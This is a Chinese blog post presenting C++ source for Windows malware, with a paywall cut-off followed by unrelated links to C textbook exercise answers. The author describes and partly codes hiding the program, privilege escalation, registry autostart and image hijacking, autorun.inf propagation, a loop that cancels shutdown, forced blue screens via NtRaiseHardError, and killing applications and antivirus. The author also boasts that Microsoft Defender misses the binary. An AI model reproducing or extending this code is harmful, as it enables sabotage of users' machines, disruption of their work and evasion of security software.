C++病毒

原创 已于 2023-02-04 18:08:37 修改 · 420 阅读 · 4
标签
#c++ #安全
于 2023-02-02 17:27:49 首次发布
这篇博客介绍了如何使用C++编写一种恶意软件,该软件能够隐藏自身、提升权限、设置开机自启动、释放autorun.inf文件、防止关机、定时打开网页、触发蓝屏、关闭常见应用以及利用EICAR测试字符串欺骗防病毒软件。所有功能通过五个线程高效执行,代码已在Dev-C++ 5.11中编译通过,并提供了Github链接。

本人思路

  1. 打开后不显示窗口,立刻将自己(病毒.exe)设置为隐藏状态,并提升自己的权限,以搞更多破坏。

  1. 修改注册表,设置为开机自启动,再设置映像劫持。然后在提升过权限的情况下锁死自己,可以有一点防杀的功效。

  1. 在C盘D盘释放autorun.inf文件,一点击资源管理器中的C盘D盘图标立刻再运行病毒.exe(防止注册表修改不成功后无法开机自启,这时点击又可以运行,等于加了双保险,总会在用户不经意间启动)。

  1. 为防止用户突然关机,一直使用shutdown -a 命令来取消关机。

  1. 每隔一段时间打开一个网页。

  1. 在一段时间内调用ntdll.dll的NtRaiseHardError以造成蓝屏。

  1. 爆杀常用应用程序,如微软Office系列、Windows下主流浏览器(包括Microsoft Edge、Google Chrome和IE)、Windows自带实用应用程序(写字板、记事本、画图、任务管理器)和其他应用程序(微信、腾讯会议、360、极域课堂、Dev-C++和其他一些杀毒软件)。

  1. 释放欧洲计算机防病毒协会的反病毒测试代码X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*,并让Microsoft Defender(旧版为Windows Defender)进行快速扫描,会进行病毒报警,引起用户恐慌(本人已在VirusTotal测试过了,Microsoft Defender(旧版为Windows Defender)扫不出来我的病毒.exe,所以不用担心被暴露)

  1. 将3~8项的功能实现在5个线程里,效率高。

最后就是代码啦!C++代码见下

#include <iostream>
#include <windows.h>
#include <TlHelp32.h>
#include <direct.h>
using namespace std;
BOOL UpPrivilegeValue()//提个权限 
{
    HANDLE hToken=0;
    if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ALL_ACCESS,&hToken))
    {
        return FALSE;
    }
    LUID luid;
    if(!LookupPrivilegeValue(0,SE_DEBUG_NAME,&luid))
    {
        CloseHandle(hToken);
        return FALSE;
    }
    TOKEN_PRIVILEGES Tok;
    Tok.PrivilegeCount=1;
    Tok.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
    Tok.Privileges[0].Luid=luid;
    if(FALSE==AdjustTokenPrivileges(hToken,FALSE,&Tok,sizeof(Tok),0,0))
    {
        CloseHandle(hToken);
        return FALSE;
    }
    if(GetLastError()==ERROR_NOT_ALL_ASSIGNED)
    {
        CloseHandle(hToken);
        return FALSE;
    }
    CloseHandle(hToken);
    return TRUE;
}
DWORD WINAPI NOSHUT(LPVOID Param)
{
    while(1)
    {
        system("shutdown -a");//防止关机 
        Sleep(500);
    }
}
DWORD WINAPI WEB(LPVOID Param)
{
    while(1)
    {
        Sleep(30000);
        system("start luogu.com.cn");
        Sleep(30000);
        system("start cn.bing.com");
        Sleep(30000);
        system("start zzcjas.github.io");
        Sleep(30000);
        system("start github.com");
        Sleep(30000);
        system("start githubs.com");
        Sleep(30000);
        system("start luogu.org");//开网站吓唬用户 
    }
}
DWORD WINAPI BSOD(LPVOID Param)
{
    while(1)
    {
        Sleep(950000);
        HMODULE ntdll = LoadLibrary("ntdll.dll");
         FARPROC RtlAdjPriv=GetProcAddress(ntdll,"RtlAdjustPrivilege");
         FARPROC NtRaiseHardErr=GetProcAddress(ntdll,"NtRaiseHardError");
         unsigned char ErrKill;
         long unsigned int HDErr;
         ((void(*)(DWORD, DWORD, BOOLEAN, LPBYTE))RtlAdjPriv)(0x13,true,false,&ErrKill);
         ((void(*)(DWORD, DWORD, DWORD, DWORD, DWORD, LPDWORD))NtRaiseHardErr)(0xc0000233,0,0,0,6, &HDErr);
    }
}//吓唬用户的蓝屏 
DWORD WINAPI FILEop(LPVOID Param)
{
    char pathn[6145];
    ZeroMemory(&pathn,sizeof(pathn));
    _getcwd(pathn,6145);
    string p=pathn;
    string kkk="";
    if(p.find("C:\\")!=string::npos)
    {
        kkk="C:\\autorun.inf";
    }
    else if(p.find("D:\\")!=string::npos)
    {
        kkk="D:\\autorun.inf";
    }
    else
    {
        kkk="E:\\autorun.inf";
    }
    string autorun="[AutoRun]\nOpen=";
    a
最低0.47元/天 解锁文章
h20111210ZZC
关注
C语言程序设计第五版谭浩强著 第五章部分课后习题答案
Baby Relentless的博客
11-17 4万+
#include&lt;stdio.h&gt; main() { int x,y,m,n,u,p; scanf("%d%d",&amp;x,&amp;y); m=x; n=y; while(y!=0) { u=x%y; x=y; y=u; } p=m*n/x; printf("最大公约数=%...
17. C语言 -- 指针和数组的关系
dugudaibo的博客
11-13 9万+
本博客主要内容为 “小甲鱼” 视频课程《带你学C带你飞》【第一季】 学习笔记,文章的主内容均来自该课程,在这里仅作学习交流。在文章中可能出现一些错误或者不准确的地方,如发现请积极指出,十分感谢。 也欢迎大家一起讨论交流,如果你觉得这篇文章对你有所帮助,记得评论、点赞哦 ~(。・∀・)ノ゙ 1. 指针和数组的关系   指针和数组之间的关系虽然十分微妙,但是不可以认为指针就是数组,因为数组名是数...
17.C 指针
热门推荐
chengsi7614的博客
07-21 21万+
C指针 学习 C 语言的指针既简单又有趣。通过指针,可以简化一些 C 编程任务的执行,还有一些任务,如动态内存分配,没有指针是无法执行的。所以,想要成为一名优秀的 C 程序员,学习指针是很有必要的。 正如您所知道的,每一个变量都有一个内存位置,每一个内存位置都定义了可使用连字号(&am...
K&R the C programming language——study notes
Blaze the Way of Quantitative Trading
09-20 2万+
1.p7 关于打印字符 %d 按照十进制整数打印 %3d 按照十进制整数打印,至少3个字符宽,且在打印区域内右对齐 %f 按照浮点数打印 %6f  按照浮点数打印,至少6个字符宽 %.2f 按照浮点数打印,小数点后有两位小数 %6.2f  \t \n   printf("Hello,World\n"); 2.p9 符号常量 在C++
《C++ Primer Plus》第17章:输入、输出和文件(4)
weixin_40064300的博客
02-24 2万+
文件 I/O
signature=0142b13a38da3ce7be8fce0d56b678af,授权系统
weixin_39798031的博客
05-29 7万+
QQ收藏格式{ID:54c14ae624119d27e26bc48e352b89e907042e3a3849d06f50220.352b89e90704ae728dc42691ba830.unknownd741eaae76e46aac0.872QEDU4224JJ660683df6f7009402019-01-04 23:04:48 星期五355.D5F0218419015837c9b2c8888...
c程序设计第五版谭浩强课后答案c程序设计课后习题答案
bookanddream的博客
07-01 6805
c程序设计第五版谭浩强课后习题答案 第一章 1.什么是程序?什么是程序设计? 程序:就是一组能识别和执行的指令,每一条指令使计算机执行特定的操作 程序设计:是指从确定任务到得到结果、写出文档的全过程 2.为什么需要计算机语言?高级语言有哪些特点? 为什么需要计算机语言:计算机语言解决了人和计算机交流是的语言,使得计算机和人都能识别 高级语言有哪些特点: ​ 2.1 高级语言的数据结构要比汇编和机器语言丰富; ​ 2.2 高级语言与具体机器结构的关联没有汇编以及机器语言密切; ​ 2.3 高级语言更接近自
C语言程序设计第五版谭浩强著 第四章部分课后习题答案
Baby Relentless的博客
11-16 1万+
#include&amp;lt;stdio.h&amp;gt; main() { int a,b,c; scanf(&quot;%d%d%d&quot;,&amp;amp;a,&amp;amp;b,&amp;amp;c); if(a==b&amp;amp;&amp;amp;a==c)printf(&quot;%d\n&quot;,a);
C语言程序设计第五版谭浩强著 第六章部分课后习题答案
Baby Relentless的博客
11-18 1万+
#include&amp;lt;stdio.h&amp;gt; main() { int i,j,prime[101]; for(i=2;i&amp;lt;=100;i++) prime[i]=1; for(i=2;i*i&amp;lt;=100;i++) { if(prime[i]==1) { for(j=2*i;j&amp;lt;=100;j++) ..
C程序设计(第五版)谭浩强——第六章课后习题
J.A.
01-20 2686
C程序设计(第五版)谭浩强——第六章课后习题 1. 用筛选法求100以内的素数。 分析:从1开始,依次用它去除后面的每个数,能被整除的就不是素数,排除掉,最后剩下的数就是素数。 #include<stdio.h> #include<math.h> #include<stdlib.h> int main(){ int a[101]; int i,j,n; ...
c程序设计第五版谭浩强课后答案 第二章习题答案
bookanddream的博客
07-01 5229
第二章:算法----程序的灵魂 1. 什么是算法?试从日常生活中找3个例子,描述它们的算法 算法:简而言之就是求解问的步骤,对特定问求解步骤的一种描述。 比如生活中的例子: 考大学 首先填报志愿表、交报名费、拿到准考证、按时参加考试、收到录取通知书、按照日期到指定学校报到。 去北京听演唱会 首先在网上购票、然后按时坐车到北京,坐车到演唱会会场。 把大象放进冰箱 先打开冰箱门,然后将大象放进冰箱,关冰箱。 2. 什么叫结构化的算法?为什么要提倡结构化的算法? 结构化算法:由一些顺序、选择、
c程序设计第五版谭浩强课后答案 第四章习题答案
bookanddream的博客
07-01 5371
c程序设计第五版谭浩强习题答案 第四章 选择结构程序设计 1. 什么是算术运算?什么是关系运算?什么是逻辑运算? 【答案解析】 算熟运算: 算术运算即“四则运算”,是加法、减法、乘法、除法、乘方、开方等几种运算的统称。 其中加减为一级运算,乘除为二级运算,乘方、开方为三级运算。在一道算式中,如果有多级运算存在,则应先进行高级运算,再进行低一级的运算。 C语言中的算熟运算符包括:+、-、*、/、++、--、% 等种类。 如果只存在同级运算;则从左至右的顺序进行;如果算式中有括号,则应先算括号里边,再按上述规则
C语言程序设计第五版谭浩强课后答案 第十章习题答案
月已满西楼的博客
06-28 1万+
C语言程序设计第五版谭浩强课后答案 最下方有所有答案的总目录 1.什么是文件型指针?通过文件指针访问文件有什么好处? 答:缓冲文件系统中,关键的概念是“文件类型指针”,简称“文件指针”。每个被使用的文件都在内存中开辟一个相应的文件信息区,用来存放文件的有关信息(如文件的名字、文件状态及文件当前位置等)。这些信息是保存在一个结构体变量中的。该结构体类型是由系统声明的,取名为FILE。 通过文件指针访问文件的好处是:可以随机访问文件,有效表示数据结构,动态分配内存,方便使用字符串,有效使用数组。 2
c语言程序设计第五版课后习题答案谭浩强第八章课后
qq_36711295的博客
05-14 5971
c语言程序设计第五版课后习题答案谭浩强第八章课后 输入三个字符串,按由大到小的顺序输出 要求用指针实现 输入10个整数,将其中最小的数与第一个数对换,把最大的数与最后一个属兑换。写三个函数:1.输入10个数;2.进行处理;3.输出10个数 有n个整数,使前面各数顺序向后移m个位置,最后m个数变成最前面m个数,。写一函数实现以上功能,在主函数中输入n个整数和输出调整后的n个数 有n个人围成一圈,顺序排号。从第1个人开始报数(从1到3报数),凡报到3的人退出圈子,问最后留下来的是原来第几号的那位 写一函数,求
c程序设计第五版谭浩强课后答案 第六章习题答案
bookanddream的博客
07-03 4165
c程序设计第五版课后答案谭浩强 1.请画出例5.6中给出的3个程序段的流程图 流程图1: 流程图2: 流程图3: 2.请补充例5. 7程序,分别统计当“fabs(t)>= le- 6”和“fabs(t)> = le- 8”时执行循环体的次数。 fabs(t)>= le- 6 ,示例代码 # include <stdio.h> # include <math.h> int main() { int sign = 1; double pi = 0.0, t
c语言程序设计第五版课后习题答案谭浩强第五章课后
qq_36711295的博客
04-09 1925
c语言程序设计第五版课后习题答案谭浩强第五章课后 输入两个正整数m和n,求其最大公约数和最小公倍数 输入一行字符,分别统计出其中英文字母、空格、数字、和其它字符的个数 求Sn = a+aa+aaa+aaa…之值,其中a是一个数字,n表示a的位数,n由键盘输入 求阶乘的和 求k的和加上k平方的和加上1/k的和,k取1到100 输出所有的“水仙花数”,所谓“水仙花数”是指一个3位数,其各位数字立方和...
c语言程序设计第五版课后习题答案谭浩强第二章课后
qq_36711295的博客
04-07 1466
c语言程序设计第五版课后习题答案谭浩强第二章课后 输出1900-2000年中是闰年的年份 求ax2+bx+c=0的根。分别考虑d=b2-4ac大于0、等于0、小于0这三种情况 输入十个数,输出其中最大的一个数 答案 c语言程序设计第五版课后习题答案谭浩强第二章课后 ...
c语言程序设计第五版第四章课后习题
cynic77的博客
09-27 751
c语言程序设计第五版第四章课后习题
《C程序设计》谭浩强(第五版课后习题答案(第二章)
最新发布
2301_79285646的博客
08-11 1738
(1)有两个瓶子A和B,分别盛放醋和酱油,要求将他们互换(即A瓶原来盛醋,现在盛酱油,B瓶则相反)。解析: 用两个瓶子显然很难实现,可以借助一个空瓶子C作为中转,先将A中醋导入C中,然后将B中的酱 油导入A中,最后将C中的醋导入B中即可实现交换。机构化算法便于编写,可读性高,修改和维护起来简单,可以减少程序出错的机会,提高了程序的可靠性,保证了程序的质量,因此提倡结构化的算法。给定N为1,sum为0,如果N 小于等于100时,进行sum += N,直到N超过100,循环操作完成后。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值